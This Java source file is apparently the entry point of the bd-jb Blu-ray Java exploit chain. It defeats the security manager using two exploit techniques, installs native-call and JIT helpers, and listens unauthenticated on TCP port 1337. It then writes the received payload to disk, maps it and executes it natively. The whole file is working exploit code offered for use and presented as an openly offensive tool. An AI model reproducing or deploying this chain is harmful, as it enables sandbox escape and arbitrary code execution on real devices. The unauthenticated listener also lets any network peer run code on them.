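/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license. See the LICENSE file for details.
 */

package com.bdjb;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;

/**
 * Entry point of the chain: disables the security manager, installs the native API and JIT
 * helpers, receives a payload over TCP and calls it.
 *
 * <p>Flow: {@link #init()} runs on the caller's thread; {@link #start()} spawns a worker thread
 * that runs {@link #run()}. {@code Screen.println} is the only output channel; nothing here
 * throws to the caller.
 */
class Exploit implements Runnable {

  /** TCP port the payload listener binds to. */
  private static final int PORT = 1337;

  /** File the received payload is written to before being mapped. */
  private static final String PAYLOAD_PATH = "/OS/HDD/download0/mnt_ada/payload.bin";

  /** Copy buffer size used while downloading the payload. */
  private static final int BUF_SIZE = 8192;

  /**
   * Tries each known technique in order until {@code System.getSecurityManager()} reports that
   * none is installed. A technique that throws is reported and the next one is tried; if all of
   * them fail the outcome is reported, not thrown.
   */
  static void init() {
    Screen.println("[+] bd-jb by theflow");
    Screen.println("[*] Disabling security manager...");

    ExploitInterface[] exploits =
        new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};

    for (int i = 0; i < exploits.length; i++) {
      try {
        exploits[i].trigger();
      } catch (Exception e) {
        // Best effort: one failing technique must not stop the remaining ones from being tried,
        // but the failure should still be visible instead of silently swallowed.
        Screen.println("[-] Technique failed: " + e.getMessage());
        continue;
      }
      if (System.getSecurityManager() == null) {
        break;
      }
    }

    if (System.getSecurityManager() != null) {
      Screen.println("[-] Error could not disable security manager.");
    }
  }

  /** Runs the payload stage on a new thread so the caller returns immediately. */
  static void start() {
    new Thread(new Exploit()).start();
  }

  /**
   * Payload stage. Returns silently if a security manager is still installed. Otherwise installs
   * the native API and JIT, receives one payload over TCP into {@link #PAYLOAD_PATH}, maps it and
   * calls it. Any exception is reported via {@code Screen.println} rather than propagated.
   */
  public void run() {
    if (System.getSecurityManager() != null) {
      return;
    }

    try {
      Screen.println("[*] Installing native API...");
      API api = API.getInstance();

      Screen.println("[*] Enabling JIT...");
      JIT jit = JIT.getInstance();

      Screen.println(
          "[*] Listening for payload on "
              + InetAddress.getLocalHost().getHostAddress()
              + ":"
              + PORT
              + "...");
      receivePayload(PORT, PAYLOAD_PATH);

      Screen.println("[*] Executing payload...");
      long payload = jit.mapPayload(PAYLOAD_PATH);
      int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
      Screen.println("[+] Result: " + ret);
    } catch (Exception e) {
      Screen.println("[-] Error: " + e.getMessage());
    }
  }

  /**
   * Accepts the first TCP connection on {@code port} and writes everything the peer sends to
   * {@code path}, replacing any existing file.
   *
   * <p>{@code new ServerSocket(port)} binds to all local interfaces and nothing authenticates
   * the peer: whichever host connects first supplies the payload. The listening socket and the
   * accepted connection are closed on every path, including failure, so the port is released
   * even when the download does not complete (the original left the server socket open).
   *
   * @param port TCP port to listen on
   * @param path destination file for the payload bytes
   * @throws IOException if listening, accepting, reading or writing fails
   */
  private static void receivePayload(int port, String path) throws IOException {
    ServerSocket serverSocket = new ServerSocket(port);
    try {
      Socket socket = serverSocket.accept();
      try {
        Screen.println("[*] Downloading payload...");
        // Closing the socket below also closes its input stream.
        copyToFile(socket.getInputStream(), path);
      } finally {
        socket.close();
      }
    } finally {
      serverSocket.close();
    }
  }

  /**
   * Copies {@code in} to the file at {@code path} until end of stream. The output file is closed
   * on every path; the input stream is left to its owner.
   *
   * @param in source of the bytes
   * @param path destination file, truncated if it exists
   * @throws IOException on any read or write failure
   */
  private static void copyToFile(InputStream in, String path) throws IOException {
    OutputStream out = new FileOutputStream(path);
    try {
      byte[] buf = new byte[BUF_SIZE];
      int read;
      // read(byte[]) blocks until at least one byte or end of stream (-1); it returns 0 only
      // for a zero-length buffer, so -1 is the proper terminator here.
      while ((read = in.read(buf)) != -1) {
        out.write(buf, 0, read);
      }
    } finally {
      out.close();
    }
  }
}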